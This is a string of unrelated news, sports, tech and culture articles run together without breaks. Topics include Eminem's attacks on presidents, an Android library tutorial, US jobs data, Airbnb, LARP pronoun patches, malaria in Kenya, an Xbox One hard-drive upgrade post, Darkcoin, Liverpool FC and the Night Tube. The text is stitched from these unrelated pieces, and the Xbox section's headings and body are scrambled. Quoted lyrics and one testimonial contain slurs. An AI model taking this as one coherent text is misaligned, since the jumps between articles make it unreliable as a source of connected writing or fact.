On October 10th , Marshall Mathers III , better known as Eminem , was recently thrust back into the spotlight after releasing his BET Cypher in which he repeatedly attacked sitting US President Donald Trump . The completely a cappella freestyle resulted in a flood of support from other anti-Trump demonstrators , heavily contrasting the threatened boycotts and outrage that erupted from the pro-Trump crowd .
While this attack may be the most deliberate and lengthy , it 's definitely not the first time that the rapper has called out presidents in his music . Here are two other times Eminem dissed presidents he disapproved of .
1 . Bill Clinton
On The Marshall Mathers LP , Eminem 's first album to go diamond , plenty of celebrities were targeted in lyrics . In the song “ Who Knew , ” however , some direct shots were taken at then-president Bill Clinton .
I 'm sorry , there must be a mix-up/You want me to fix up lyrics while the President gets his d * * k sucked ? /F * * k that , take drugs , r * pe sluts/Make fun of gay clubs , men who wear make-up
In these lines , Eminem is directly referring to Bill Clinton 's 1998 sex scandal involving President Clinton and 22-year-old White House intern Monia Lewinsky . The scandal left a lasting blemish on Clinton 's presidency , with trials and court cases taking up much of 1998 .
This direct attack on an already sensitive subject , not to mention the extremely sexist , homophobic , and transphobic message in the lines led to extreme controversy throughout not only this song , but the entire album upon its release .
Along with that line , another controversial line was released regarding Clinton in Eminem 's 1999 Album The Slim Shady LP .
So if I said I never did drugs , that would mean I lie and get f * * * ed more than the President does
2 . George W. Bush
George Bush received the blunt of Em 's wrath on the 2004 album Encore , which ended up going 4x Platinum in the US , selling over 5 million copies in the US alone . The songs “ Mosh ” and “ We As Americans ” primarily dealt with political controversy at the time .
The entire song “ Mosh ” is an anti-war , anti-Bush anthem , ripping the President for his involvement in Iraq .
Mosh pits outside the Oval Office , someone 's trying/To tell us something maybe this is God just/Saying we 're responsible , for this monster/This coward that we have empowered , this is Bin Laden/Look at his head nodding-how could , we allow/Something like this without , pumping our fist now .
Along with constantly saying “ F * ck Bush , ” Marshall made some choice comments about the Iraq war .
Rebel with a rebel yell , raise hell , we gon ' let 'em know/Stomp , push shove , mush ; f * * k Bush ! /Until they bring our troops home , come on
While the entire song condemns the Iraq war , the real controversy arose from one of Eminem 's lines on “ We As Americans . ”
F * * k money . I do n't rap for dead presidents . I 'd rather see the President dead ,
Within both the explicit and censored versions of the song , the word “ dead ” was censored . The aggressive line landed the rapper directly in the crosshairs of the Secret Service , though nothing eventually resulted from the investigation .
So while the spotlight is on Eminem 's BET Trump diss , it 's important not to forget that the rapper 's career has thrived off of disrespect of authority and controversy , two things clearly visible in the BET Cypher . It 's time we recognize Eminem 's new diss for what it is : simply a continuation of his lifelong attitudes toward government and authority in general .
Disclaimer : Neither the author of this article nor 71Republic.com endorse the language or message of certain lyrics depicted within .
Max Bibeau is a Senior Editor for 71 Republics . You can contact him through email at [ email protected ] , or follow him on Instagram with the handle @ _maxbibeau .
Advertisements
Like this : Like Loading ...
Today we finally start our engine 's Android library . After this day there will be a distinction between the game project we are working on and the game framework that powers it . If you are new to Android Studio , today will be specially interesting for you .
Starting a library
Projects and modules
If you are making a simple app , you will probably have a project with all the graphics , meta information , and code files that make up that app . It gets more complicated when you work on bigger solutions . Apart from your specific project , you might also need some external libraries which are not coded by you , or some additional apps to test your app . In other words you will be putting together a few individual projects to work together to achieve a bigger goal . This kind of modularity is addressed by modern IDEs . However , different IDEs handle it in different ways .
Eclipse
In Eclipse you have all your project files in a single workspace . Eclipse 's approach for modularity is through working sets . You can simply group projects that work together into working sets . You can even have a single project in several working sets ( a library for example might be needed by several other projects ) . After this you can focus only on a single working set at a time , which you know will have everything you need for your specific solution .
Microsoft Visual Studio
In Visual Studio you do n't have all your projects in a single view . In fact they can even be widely spread in your file system . VS handles modularity through solutions . A solution is a group of project working together as a single unit . Each project might come from a different source , but as long as it is in the solution , it can cooperate with all other projects . Each solution also has a single Startup Project which is the one that runs when you hit F5 ( the short-cut for Debug in VS ) .
Android Studio
This is what we will be dealing with . Android Studio is based on IntelliJ IDEA . The approach used in that IDE is very similar to Visual Studio . Here you have projects and modules . A single project can be opened at a time , which consists of at least one module . So if you want anything work with your project , you must add it as a module .
Creating a library module
Our project in Android Studio currently has a single Module called “ My Game ” , but we are about to add another module for our games framework . So if you have your project My Game open , just click “ File › New › New Module … ” to start creating a module . In the first screen choose Android Library ( from More Modules ) .
On the next screen , you will be asked to give your module a name and choose minimum SDK . We target minimum API level 9 , since some features that we use are not available in older APIs . The figure below shows the settings that should be entered for this page . For module and package names you can choose for yourself , but since we will be referring to them with these names throughout this guide , it is recommended that you choose the same .
In the next screen , you should opt out of creating an activity , since it is a library project . When you click finish , you will notice that the library module is added to the project as a sub-directory .
Cleaning up the library
Although we have opted out of as many auto-generated files as possible when creating the module , there are still some additional steps we should take to make it a bare library :
A library does not need a launcher icon . The drawable-xxxx directories hold this icon in different resolutions . So we are going to delete all of them for now . If we need drawables later we will add necessary directories back . The file “ values/strings.xml ” contains only one value and that 's the app name . Again , this is not an app and consequently we do n't need this file at all . Having done the above , we 've troubled AndroidManifest.xml as it has references to everything we 've deleted . So , we have to fix it .
After taking the first two steps , the resulting project will look like this ( pretty empty ) :
For the last step , open AndroidManifest.xml in Artenus module . You can see it has an < application / > tag . This tag is only used to describe applications , not libraries . However , at the time of this writing , we can not remove this tag in Android Studio , or the library wo n't compile . We can , however , strip it of all attributes and child elements , and that will not enrage Android Studio . Maybe this need will be removed in a later release . The final manifest file looks like this :
< manifest xmlns : android= '' http : //schemas.android.com/apk/res/android '' package= '' com.annahid.libs.artenus '' android : versionCode= '' 1 '' android : versionName= '' 1.0 '' > < application / > < /manifest >
Moving content to the library
We now have a freshly created library , we need to move our content to it . But is moving files from one project to another a simple operation ? The answer is what we are going to discuss here .
What is refactoring ?
Code refactoring is a disciplined technique for restructuring an existing body of code , changing its internal structure without changing its external behavior . Sometimes you may undergo some changes in your project that only affect your code in favor of speed , readability , or modularity . The user might not feel any difference . Examples of changes can be :
Encapsulating fields ( forcing getters and setters for fields ) .
Creating general types and extend them using your several existing types that share a lot of code .
Replace type-checking code ( which is usually bad ) with state/strategy .
Revising your package structure . Moving some files from one package to another .
Moving bits of code between classes .
Making these changes which leads to a better code while maintaining the output of the application id called refactoring . Android Studio provides a number of refactoring options which can save some development time when they are needed .
Is moving files refactoring ?
It depends on what files are being moved . In application development , the answer is most likely yes . The reason is that a file that is part of an application probably has references throughout the code . If it is a code file , it is part of a package and other code units might be using it with a reference to that package . So the effort needed to move the file is beyond just changing the physical location . All references to the class being moved should be updated to the new location/package and possibly the new name . Besides , you are effectively changing the code structure . That 's why you are refactoring by definition and that 's why , unlike Visual Studio , moving and renaming files fall into refactoring in Eclipse and IntelliJ IDEA ( hence Android Studio ) .
Applying it to our project
We want to rearrange our project 's files so each file resides in its appropriate module and package . Our main activity can stay where it already is , because it belongs to “ My Game ” app . But Stage and Texture are part of the Artenus framework and should be moved to the library . This can be done by choosing the two files , and dragging them to the destination , which is the package com.annahid.libs.artenus in Artenus module . As soon as you drop the files there , a dialog will pop up :
The appropriate options should be already selected . The files will be moved into the package and all references in them will be updated . But there is one small problem . You will probably get this in the end :
The errors are suggesting that the moved classes are used in “ My Game ” and wo n't be accessible any more . You should remember that Artenus is a separate entity and everything in Artenus is only visible there , and not to My Game , unless we explicitly make them visible . That 's what we are going to do next .
Using the library
Referencing the library
We said that classes in the Artenus library are not visible to My Game by default . If we want to use this library we should instruct My Game to use it . This is called referencing Artenus . It is pretty easy to do that in Android Studio . Right-click My Game and choose Open Module Settings . In the Project Structure dialog that opens make sure My Game is selected . Then go to “ Dependencies ” tab and click the + sign on the right , and from the drop-down menu choose Module Dependency :
There will be only one choice since your project has only two modules . Choose Artenus and add it to dependencies . Now click OK to apply this change . From this point on , all packages in Artenus are visible and can be used in My Game .
Fixing a mistake !
If we had referenced Artenus prior to moving the two files , the references would have been automatically updated . But right now there is a little bit of twist . To do this manually , you can add this line to every file ( essentially just MainActivity.java ! ) that is using those classes :
import com.annahid.libs.artenus . * ;
Alternatively , you can move the files back to My Game , and then move them again to Artenus . This time the references will be updated . I made this mistake intentionally for two reasons . One was to keep the article structure the way it is , the other was to make this point :
Always add the required module references before moving files between projects . It makes refactoring less of a pain . Here we had only one file . For large projects , we really do n't want to do things manually .
The library and the app should now be working fine together and you should be able to compile and run My Game and get the same result you got on day 6 . If not , you might be missing something and I can help you find it if you drop me an email .
Next steps
We are going to work more on our texture framework as it is not mature yet , and it is definitely not used in our stage . I made this day rather short so we can talk more about interesting stuff next day .
last updated on
Job applications and information for the Gap Factory Store sit on a table during a job fair at Dolphin Mall in Miami . | AP Photo Economy added 227,000 jobs in January
The first jobs report under President Donald Trump showed the economy added 227,000 jobs in January , the Labor Department reported Friday , up from December 's 157,000 .
Unemployment was 4.8 percent , up from December 's 4.7 percent . Average private-sector earnings were up 3 cents over December , when they rose 6 cents . Wages were up 2.5 percent over January 2016 .
Story Continued Below
The unusually strong job gains may signal market confidence in Trump 's proposed tax and regulatory cuts — even though Trump did n't assume office until Jan. 20 . But further tightening in the labor market puts additional pressure on the Fed to raise interest rates , which would undermine Trump 's pledge to achieve 3 or 4 percent annual growth in GDP .
The jobs report comes two days after the Fed 's Open Market Committee said it would not raise interest rates , possibly signaling uncertainty about where the economy is headed .
President Donald Trump said in response to the new jobs numbers that there was `` great spirit in the country right now . ''
`` We 're very happy about that , '' he said . `` I think that it 's going to continue big league . ''
During the 2016 campaign Trump attacked President Barack Obama 's economic policies in part by arguing that BLS data were cooked , a position rejected by virtually every reputable economist . Candidate Trump called the unemployment rate `` one of the biggest hoaxes in modern politics . '' President Trump cast no such disparagement on today 's favorable numbers .
In a statement , House Ways and Means Chairman Kevin Brady sounded more optimistic about Friday 's jobs report , compared to those of previous months .
`` Today 's jobs report is good news , '' he said . But he cautioned that `` we have a lot of work ahead of us to get our economy running at full speed. ``
Morning Money Political intelligence on Washington and Wall Street — weekday mornings , in your inbox . Email Sign Up By signing up you agree to receive email newsletters or alerts from POLITICO . You can unsubscribe at any time .
Analysts ' reaction to the jobs report was mixed . Naeem Aslam , chief market analyst at Think Markets , told CNBC that `` it is not all good news when it comes to the U.S. jobs number because if you peel the layers , it shows that the downside surprise is in the wage report and a lot of disappointment there . '' He added that `` we still need to see more readings before we can see that there is a trend because this number is full with noise . ''
Elise Gould , senior economist at the left-leaning Economic Policy Institute , was more positive . She said Friday 's jobs report `` [ capped ] off more than six years of steady job growth under President Obama . '' But Gould added that while the economy is `` on its way to full employment ... job growth has been slowed by austerity at all levels of government and wage growth is still below where it should be . ''
Analysts surveyed by Bloomberg had predicted the creation about 175,000 jobs , an unemployment rate of 4.7 percent and an increase in hourly earnings of 0.3 percent . The payroll company ADP estimated Wednesday based on its own records that January job growth in the private sector was 246,000 .
The jobs report followed news from the Commerce Department last week that GDP increased 1.9 percent during the fourth quarter of 2016 . That was lower than the third quarter 's 3.5 percent but higher than the second quarter 's 1.4 percent and the first quarter 's 0.8 percent . For the year , GDP increased 1.6 percent , down from 2.6 percent in 2015 and 2.4 percent in 2014 . The Commerce Department 's second cut at estimating fourth-quarter growth and 2016 growth will be released February 28 .
Labor force participation remained low at 62.9 percent , up from December 's 62.7 percent , close to its lowest level since the 1970s .
SAN FRANCISCO — Over the last few years , so-called sharing companies like Airbnb and Uber — online platforms that allow strangers to pay one another for a room or a ride — have established footholds in thousands of communities well before local regulators have figured out how to deal with them .
Now , as cities grapple with the growth of these services and try to pass rules for how they should operate , the companies are fighting back by turning their users into a vast political operation that can be mobilized at any sign of a threat .
Airbnb offered the latest and most vociferous example of this on Wednesday . Fresh off defeating a San Francisco measure that would have severely curtailed the company 's business in its hometown , Airbnb staged a news conference that functioned as a warning shot to other cities thinking about proposing new regulations .
The event was billed as a debriefing to discuss the defeat of Proposition F , which would have toughened existing rules for the service by , among other things , cutting the number of nights people could rent out rooms in their homes .
One of the best things about LARP is the ability to be who you want to be , and leave the mundane , terrible , real world behind . And regardless of what organization you play in , players feeling respected and empowered is one constant factor . Dystopia Rising has embraced this in powerful and beautiful ways .
Recently , Dystopia Rising has adopted the use of “ Gender Pronoun Patches ” as a way for players to further identify , and be identified , with their desired gender pronouns . These patches , bright yellow and about 3″ across , fit in with most DR costuming seamlessly .
The reaction to these patches has been thoroughly positive , and is best described by # ApocalypseFamous LARPer Tyson Hood :
One of the coolest parts of Dystopia Rising that I feel stands out from other gaming atmospheres is how willing the players are to suspend immersion for incredibly specific undesireable realities of life with the entire purpose being to make players feel more comfortable in game , so they do n't have to deal with these specific attitudes during , what is essentially , their vacations . For example – rape does n't exist . It 's never existed in the universe . You 're not allowed to have it in your backstory . You 're not allowed to joke about it . You 're not allowed to threaten it . The word does n't exist and if you say it you 're breaking the rules . Another example I heard today , a huge event with hundreds and hundreds of players watching a small group fight that apparently was rather stalled . Someone from the crowd yelled for everyone to throw away their shields and to “ stop being faggots ” – I guess the entire crowd , hundreds of people , shut the fuck up and stared at this player ( who admittedly , probably just played too much CoD and got worked up ) and one of the badass participants spoke , staying entirely in character , “ We do n't say that word , Vato ” and went on with the fight . Just this week there was some concern from the transgender community within the game that players were n't making the effort to use desired pronouns – almost instantly national comes out with super affordable pronoun patches that are specifically genre 'd for the venue and even encourages cis members to wear them as a solidarity gesture . Little shit like this makes such a huge impact on me , makes me feel good to be part of the community . The idea that we can be playing in an absolute hellscape where death torment and sorrow are the bread and butter of existence , and still My Little Pony the fuck out of feelings is so impressive to me . A+ Luv Luv , Bye Bye
Tyson
You can order these patches directly from the Dystopia Rising site , HERE . IF YOU GET ONE OF THESE PATCHES , SEND A PHOTO OF YOURSELF TO EN.SUBMISSIONS @ GMAIL.COM WEARING IT TO BE FEATURED IN AN UPCOMING PHOTO COMPILATION !
From me and my cohort @ imjoshharrison – Team Phoenix Outlaw Productions FULLY supports @ DystopiaRising and the pronoun patches . Amazing idea — Shoshana Kessock ( @ ShoshanaKessock ) June 6 , 2016
Photos by Dystopia Rising LARP
As the labor market has improved over the past couple of years , a litany of reasons has been offered to explain why the picture is really not so good :
The unemployment rate is falling because people are dropping out of the labor force . The job numbers are being inflated by suspect seasonal adjustments . The birth-death model , which the Labor Department uses to estimate jobs from newly created companies , is providing a boost that will turn out to not be there . The real problem is long-term unemployment .
The trouble for those who would be negative is that none of those things are true now .
The proportion of the unemployed who have been out of work for more than six months fell below one-third in June for the first time in five years . The seasonal adjustments and the birth-death model all worked to reduce the reported job gain , not increase it . The household survey found 407,000 more people had jobs , well above the 288,000 figures in the establishment survey .
The so-called U-4 unemployment rate , which adds to the unemployment rate those who say they are not looking for work because they are discouraged , is down to 6.5 percent , a six-year low . The U-6 rate , which throws in every group pessimists can think of — including treating part-time workers as unemployed if they say they would rather have a full-time job — is 12.1 percent , also a six-year low .
But my search for something negative did find one thing . The teenage unemployment rate went up , to 21 percent from 19.2 percent . That rate is still well below where it was last summer , but it is something .
UK-funded research shows climate change has caused a seven-fold increase in cases of malaria on the slopes of Mount Kenya
Rising temperatures on the slopes of Mount Kenya have put an extra 4 million people at risk of malaria , research funded by the UK government warned today .
Climate change has raised average temperatures in the Central Highlands region of Kenya , allowing the disease to creep into higher altitude areas where the population has little or no immunity .
The findings by a research team funded by the UK Department for International Development ( DfID ) , showed that seven times more people are contracting the disease in outbreaks in the region than 10 years ago .
The team from the Kenyan Medical Research Institute ( Kemri ) said that while similar outbreaks elsewhere have been attributed to multiple factors including drug resistance and changes in land use , the only change on Mount Kenya is a rise in temperature .
The average temperature in the Central Highlands was 17C in 1989 , with malaria completely absent from the region . This is because the parasite which causes malaria can only mature above 18C .
But with temperatures today averaging 19C , mosquitos are carrying the disease into high altitude areas and epidemics have begun to break out among humans .
Kemri is using climate models to predict when epidemics might occur up to three months in advance , giving authorities time to stock up on medicine and warn the public of the dangers .
The institute is also using church meetings and local health clinics to educate people in high-altitude areas on how climate change could be leading to the spread of malaria into their area .
In the west Kenyan highlands , where malaria has been present since the late 1980s , programmes have been providing mosquito nets for people to sleep under - with DfID providing 14m bed nets since 2001 .
But because malaria is a relatively new phenomenon , less than half of those who own bed nets use them , DfID said .
In areas where researchers have been encouraging people to use them the incidence of malaria has dropped markedly and epidemics have been all but eradicated .
The international development secretary , Douglas Alexander , said : `` The spread of malaria in the Mount Kenya region is a worrying sign of things to come .
`` Without strong and urgent action to tackle climate change , malaria could infect areas without any experience of the disease .
`` That 's why we need to make sure vulnerable , developing nations such as Kenya have the support they need to tackle the potentially devastating impacts of climate change . ''
Earlier this week [ Monday ] , the Los Angeles Rams hired former Chicago Bears quarterback coach Mike Groh . He 'll operate as the team 's receivers coach/passing game coordinator .
On late Thursday evening , according to a source , the Los Angeles Rams nabbed themselves another coordinator familiar with the Bears , acquiring former running backs coach - Skip Peete - to the same role .
Peete is no stranger to this position , having been a running backs coach for almost the entirety of the last two decades ; with 2015 being the only year in which he did n't hold the position :
Chicago Bears [ 2013-2014 ]
Dallas Cowboys [ 2007-2012 ]
Oakland Raiders [ 1998-2006 ]
UCLA [ 1996-1997 ]
Michigan State [ 1993-1994 ]
The good news for Peete is that he 's walking into a great situation with the Rams , given the talent at the position . He 'll inherit Rookie-of-the-Year hopeful , Pro Bowl running back Todd Gurley . And the team 's backups - Tre Mason and Benny Cunningham - provide solid depth .
If the name `` Peete '' struck you as familiar , that 's probably because it is . Skip 's brother Rodney played quarterback in the NFL for 16 seasons . Their father , Willie , was a long-time coach in the NFL , dating back to 1960 where he was an assistant coach at the University of Arizona . It 's fair to assume Skip learned a thing or two from his pops , as well , as Willie was a RB 's coach in the NFL from 1983-1995 with the Chiefs , Packers , Buccaneers , and Bears .
For a team as talented as the Rams , complaints are often made that it 's the coaching preventing the team from getting over .500 , earning a playoff berth , etc . It 's early in the offseason , but it appears the Rams are taking the necessary steps to ensure the rubber meets the road when the season kicks off in 2016 .
UPDATE :
Xbox One HDD Tools
What this does
How
Instructions
Connect your HDD and take note of what its called ( ex : sda , sdb etc ) Run the script with the device name as the first parameter It will bitch about missing partitions etc , but write a file with commands to create said missing partitions Run the created script Copy the correct files to the newly created partitions Unmount the newly created partitions Run the main script again
Putting it back together
What is linux ?
UPDATE : Now available within J-Runner Ver 3 Build 4
v0.3 4
- Added an option to prepare an hdd for use with an XBox One . It 's beta so use it at your own risk . We used x360usb v1 on our tests .
- Fixed hex editor popping up when extracting files Click to expand ...
Required Files
I think one of our dev team may have figured out how to successfully install a bigger HDD to an XBOX ONE . Tested with a 1TB so far and it seems to work well - although I have n't seen it myself yet . It 's Thanksgiving night and i 'm sh * t facedThis is not a 100 % confirmation but it 's looking good so far . Will post more info as I get it.Great for the scene to have the very first XBONE `` hack '' thoughOK ConfirmedFull credits to Juvenal for this little beauty - you rock broAs always no guarantees are given and use at your own risk ! Given any HDD over 500GB in size , you can format it for use with you Microsoft Xbox One consoleAll of this must be done as root ! I HIGHLY suggest you do this on a livecd or usb booted system if you do n't 'know linux ' and would rather not wipe the wrong hard drive.When you put the new HDD in your console for the first time and boot up , the console will go the the green `` Xbox One '' screen , pause for a second or two , then shut down . Boot the console again . This time it should pause at the green screen for a while longer , then go to a black screen for even longer . It can take several minutes before anything happens after this , the xbox is automatically creating temporary files during this time . If you copied everything correctly , it WILL go to the dashboard eventually , just be patient ! Wait for a window versionThese can be gotten off your original HDD easilyWe are working on a Windows app - maybe integrating with our already established HDD Hacker Tool that was used for the 360 or something standalone . Stay Tuned
With 71 goals , three titles and some wonderful performances , the striker has carved his name into the history of Europe 's premier club competition - and he could still return
“ In his mind there is only the goal ; it 's the essence of football ”
- Thierry Henry
Dream debut and early success
A Champions League double and Manchester United glory
RAUL | Goals , goals , goals
Team Games
League
Cup Europe
Other
Real Madrid
741 228 18 66 11 Schalke
48 12 1 5 0 Spain
102 0 0 0 44 Total
891 240 19 71 55
Top scorer and third title in five years
A half century
“ I think he is the greatest player to have ever played the game . He walks on the turf and astounds . It is utterly amazing . ”
- Luis Figo
Follow Ben Hayward on
Guy Bentley
Privacy focused cryptocurrency Darkcoin has seen its price surge by 19 per cent in the last 24 hours .
One Darkcoin is now worth $ 3 and the digital currency has reached a market capitalisation of $ 12.8m . The rise comes fresh after the launch of an updated version of its payment system Darksend .
Named release candidate two ( RC2 ) it provides Darkcoin users with total anonymity by mixing their coins to conceal their source . Users of the Darksend system have their payments split into smaller denominations and pooled with other users .
Those receiving payment draw Darkcoin from the pools until they have received the correct amount . Those viewing the blockchain will be able to see payments being made but will be none the wiser as to who paid who .
Created with the intention of providing cryptocurrency users with total privacy , Darkcoin has experienced one the fastest appreciations ever amongst altcoins
Invented in January by 32-year old Arizona based programmer Evan Duffield , Darkcoin has jumped to being among the top ten most valuable cryptocurrencies . Duffield has been critical of the pioneering digital currency Bitcoin , saying that its public ledger allows for `` a gross invasion of personal privacy '' .
Duffield argues that making payments with Bitcoin is equivalent to leaving your checking account open in your browser and everyone on the internet can see what you bought .
Darkcoin has enjoyed a dramatic rise in its first five months , with Duffield promising to spend another two years on the project and keep it open source .
Get the biggest Liverpool FC stories by email Subscribe Thank you for subscribing We have more newsletters Show me See our privacy notice Could not subscribe , try again later Invalid Email
BRENDAN RODGERS believes Liverpool will need a 74-point haul to achieve Champions League qualification as he backed his players to deal with the pressure of the run-in .
The Reds go into Monday night 's Premier League clash with Swansea City at the Liberty Stadium looking to maintain their relentless pursuit of a top-four spot .
Fifth placed Liverpool have taken 30 points out of the last 36 on offer but Rodgers says they will need 23 more points over the last 10 matches to achieve their target . That effectively means they will need to win seven and draw two of their remaining games .
“ We have 30 points to play for so I am guessing it will be another 23 points , ” said Rodgers , whose side will move back to within two points of fourth placed Manchester United if they beat Swansea .
“ That is how competitive it has been this year . We have won nine and drawn two of the last 11 . It has been a great run but now we have to be focused on these last 10 matches .
“ Everything counts . We have to be aggressive in our game and now we have to nail it in the last 10 . I know the players are focused on that . ”
Rodgers believes the experience of last season 's title challenge will help his squad over the coming weeks .
Liverpool may have ultimately lost out to Manchester City after a home defeat to Chelsea surrendered the initiative but Rodgers dismisses suggestions that the Reds showed any signs of crumbling in the high-stakes encounters .
“ Last season will help us , ” he said .
“ We dealt really well with the pressure . We won 12 out of 14 in the run-in and it was unfortunate that we lost one . Okay , that was the one that mattered but it was n't through not being able to deal with pressure . We were unlucky that day .
“ We conceded right at the end of the first half and then right at the end of the second half . We dealt with pressure remarkably well and our game is based on that . We play a technical game and that is a big part of why my teams do well in the second part of the season .
“ Our game is based on dealing with pressure because they have the courage to play , so when it comes to these moments , we do well with it . ”
Martin Skrtel ( concussion ) and Joe Allen ( hip ) are expected to be passed fit to face Garry Monk 's Swansea , while Steven Gerrard is set to make his comeback after missing the past seven matches with a hamstring injury .
Gerrard 's glittering Liverpool career only has a maximum of 13 games left to run before he says his farewells and joins Los Angeles Galaxy this summer .
Rodgers must decide whether to bring the long-serving captain straight back into midfield or use him as an impact player coming off the bench .
“ Everyone is waiting to see if Stevie comes into the team or not , but it was the same when Daniel Sturridge was fit again , ” Rodgers said .
“ Does he or does he not ? What you have seen over my time here is that it 's about the team and how we can get results as a team .
“ The most important thing is Steven is back fit and we have Lucas Leiva coming back soon too . That will add to the competition for places and with one game a week , barring the cup game , then everyone is going to be fighting and being competitive about playing .
“ The beauty of this season is that everyone had an opportunity in the first three or four months of the season and then we found a way to win . It is something everyone has to respect . It is about the team and the spirit of the team and I will always pick the best team I feel to win a game . ”
The manager insists sentiment wo n't come into it regarding Gerrard 's role over the closing months of the campaign .
Liverpool have been impressive in the absence of the 34-year-old and proving they can win without him is vital going forward . But Gerrard remains the Reds ' joint top scorer with Raheem Sterling on 10 goals this season and Rodgers knows he still has much to offer before he heads for Hollywood .
“ This is a guy who is one of the greatest players in the history of the Premier League and arguably the greatest player in the history of this club , ” Rodgers said .
“ But what I do know is that Stevie always puts the team first . I have huge respect for him whether he is playing or not playing and huge admiration for him as a player and a person .
“ But I am not one that makes emotional decisions on whether I like someone or not . For me it is about picking and finding the right balance in the team and what makes the team function to ultimately win . He still has big qualities that we will need between now and the end of the season .
“ I 'm managing a situation here with arguably the greatest player to have played for the club towards the end of his career . Of course there are challenges .
“ There was with Luis Suarez , Jamie Carragher . It is about managing all these situations whilst trying to build a team to make this club competitive again at the very highest level . You earn your money . ”
Liverpool , who could equal a club record of six successive away league clean sheets , are seeking their first win at the Liberty Stadium have drawn two and lost one of their three previous visits .
They will be up against midfielder Jonjo Shelvey , who was sold to Swansea for £5million in 2013 after scoring seven goals in 69 appearances for the Reds .
Shelvey has proved a central figure in recent clashes between the clubs - scoring in both meetings last term and heading home an own goal in the Swans ' 4-1 defeat at Anfield in December . Rodgers has no regrets about moving Shelvey on .
“ It was the right thing to do for Jonjo , ” he added .
“ He was a kid that needed to play , he was n't going to play regularly here and he needed the opportunity .
“ I recommended that he went to Swansea . I think it was right for both at the time . History shows how we have developed and progressed .
“ He is a good kid Jonjo , he came here as a young boy and it was difficult . He wanted to play and I was n't going to be able to guarantee him that . He needed to go for his career to play somewhere regularly and he has done that pretty much for Swansea . ”
On Wednesday , all three network morning shows repeated the White House line that the reason for delaying the March 31 ObamaCare enrollment deadline was due to a last-minute `` surge '' of people signing up . In a 20-second news brief on NBC 's Today , fill-in newsreader Tamron Hall announced `` a reprieve this morning for people who 've been trying to sign up for ObamaCare , '' before noting that `` the Health and Human Services Department says there has been a last-minute surge in demand . '' [ Listen to the audio or watch the video after the jump ]
During a 17-second news brief on ABC 's Good Morning America , fill-in newsreader Amy Robach gently described the law 's new setback as a sign-up `` grace period '' and declared : `` ... the White House predicts a crush of applicants in the final hours could cause a computer traffic jam . ''
CBS This Morning was the only morning show to offer a full minute-long report on the ObamaCare delay , with correspondent Jan Crawford touting the same government talking points : `` The Obama administration says it 's doing this because it 's seeing , as you know , this recent surge in enrollment . It 's been on that kind of full court press lately to get as many people as possible to show up – to sign up . ''
However , unlike her counterparts on NBC and ABC , Crawford actually mentioned Republicans criticizing the latest unilateral change to the health care law : `` Republicans are saying , look , this is just more delays for a law that is n't going to work no matter how often the administration changes it . ''
Here is a transcript of the March 26 network morning coverage :
Media playback is unsupported on your device Media caption Boris Johnson reveals the Night Tube map
London Underground will run weekend services 24 hours under plans that also involve ticket office closures and up to 750 job cuts .
The Night Tube will provide services on the Piccadilly , Victoria , Central , Jubilee and Northern lines .
But Transport for London ( TfL ) said every ticket office would close by 2015 , resulting in the job cuts .
The RMT union said it had `` not ruled out '' strike action in the run-up to Christmas over the `` lethal '' cuts .
Three-week process
For action to take place the RMT ( Rail , Maritime and Transport Union ) would have to hold a two-week ballot and give TfL seven days notice .
In a tweet , the BBC 's transport correspondent Richard Westcott said : `` RMT just told me they have n't ruled out calling for strikes b4 Christmas on the # londonunderground ''
The transport authority is facing a budget reduction of about £78m in the financial years of 2013 and 2014 and said the plans would help it save more than £40m a year .
TfL says six major central London stations will have special customer points to help tourists and that every station will be staffed while the tube is running , with workers moved out of ticket offices into station booking areas .
It is also promising :
Analysis Closing all ticket offices is one of the most radical changes to the Tube in its history - it 's up there with electrification and the Oyster card . And it will be a huge sell for London Underground and the Mayor . We knew cuts were looming but what they have done is bundle 24hr weekend running of the Tube into the same plan . Cynics would say London Underground are trying to undermine the unions position by sweetening the pill for the travelling public . A later running tube will be very popular . They 've also said there will be no compulsory redundancies . The unions have already said they 'll use everything at their disposal to head this off . They would not want their members at stations in outer London on their own at 3am with just an iPad for company . They will not want job losses even if the promise is all stations will be staffed . It 's difficult to not see the first tube-wide strikes in four years . Ultimately , you suspect this will be decided in the court of public opinion of the Tube 's passengers .
Wi-fi coverage across all below-ground stations
Disabled access at a further 27 stations
Contactless bank card payment to make it easier to pay for tickets
More new trains and updates for stations
The initial plans for the 24-hour Night Tube include overnight trains on Friday and Saturday , with plans for it to expand over subsequent years .
Mayor of London Boris Johnson , said : `` This is just the first stage in an opening up of the tube network to become 24 hours .
`` For 150 years the Tube has been the beating heart of London , its tunnels and tracks providing the arteries that have transported millions of people and helped to drive the development and economic growth of our great city . ''
London Underground will now go into a 90-day consultation on its proposals but says there will be no compulsory redundancies and has promised that every member of staff who wants a job and who is `` ready to be flexible '' will have one .
The managing director of London Underground Mike Brown , said : `` All Tube stations will continue to be staffed and controlled in future , with more staff visible and available to customers . ''
Image caption London Mayor Boris Johnson said it was time to take the Tube `` to the next level ''
But the RMT , which represents most of the station staff who would be affected , has said it would `` fight these plans with every tool at our disposal and that includes political , public and industrial campaigning on an unprecedented scale '' .
RMT General Secretary Bob Crow said the `` proposed cuts will decimate staffing levels and hit the most vulnerable users '' of Tube services .
He said : `` The mayor must believe he is some sort of magician if he thinks he can slash a thousand jobs and still run safe services when everyone knows that staffing has already been cut to the bone while passenger demand continues to rise .
`` Throwing in the plan for night time operation at the weekends is just a smokescreen to try and camouflage the real issue which is a savage cut to jobs , access and safety . ''
Manuel Cortes , leader of the Transport Salaried Staffs ' Association rail union , accused the mayor of being the `` hypocrite of the decade '' .
Tube statistics In 2012/2013 1.2bn passengers carried
Length of network : 249 miles ( 402km )
Total staff 19,000
Stations managed : 260 Source : TfL
He said : `` It beggars belief that the mayor , who was elected in 2008 on a pledge to keep open every ticket office , is now planning to close every single one , with all that means for safety and jobs .
`` We shall be launching a joint campaign with Labour to reverse this decision . ''
Customers have expressed concern over the ticket office closures but broadly welcomed the 24-hour service .
Garvie Gay , 36 , from Bedford said he regularly needed help from counter staff .
He said : `` It 's not good because I do n't know where I 'm going half the time . I 've not really got a clue but for regulars I suppose it would n't be a problem . ''
In March , BBC London reported TfL is facing a 1 % cut in its government grant this year , and 2 % the following year .
In cash terms , it means a loss of £33m for 2013-14 , and £45m for 2014-15 .
In January , passengers saw a 4.2 % increase on average in fares across the Tube , buses and trams .
A scene from `` China Syndrome '' Are environmentalists rethinking nuclear power ? The enviro-doc `` Pandora 's Promise '' enters the forbidden zone on nuclear power , exposing a deep split among greens
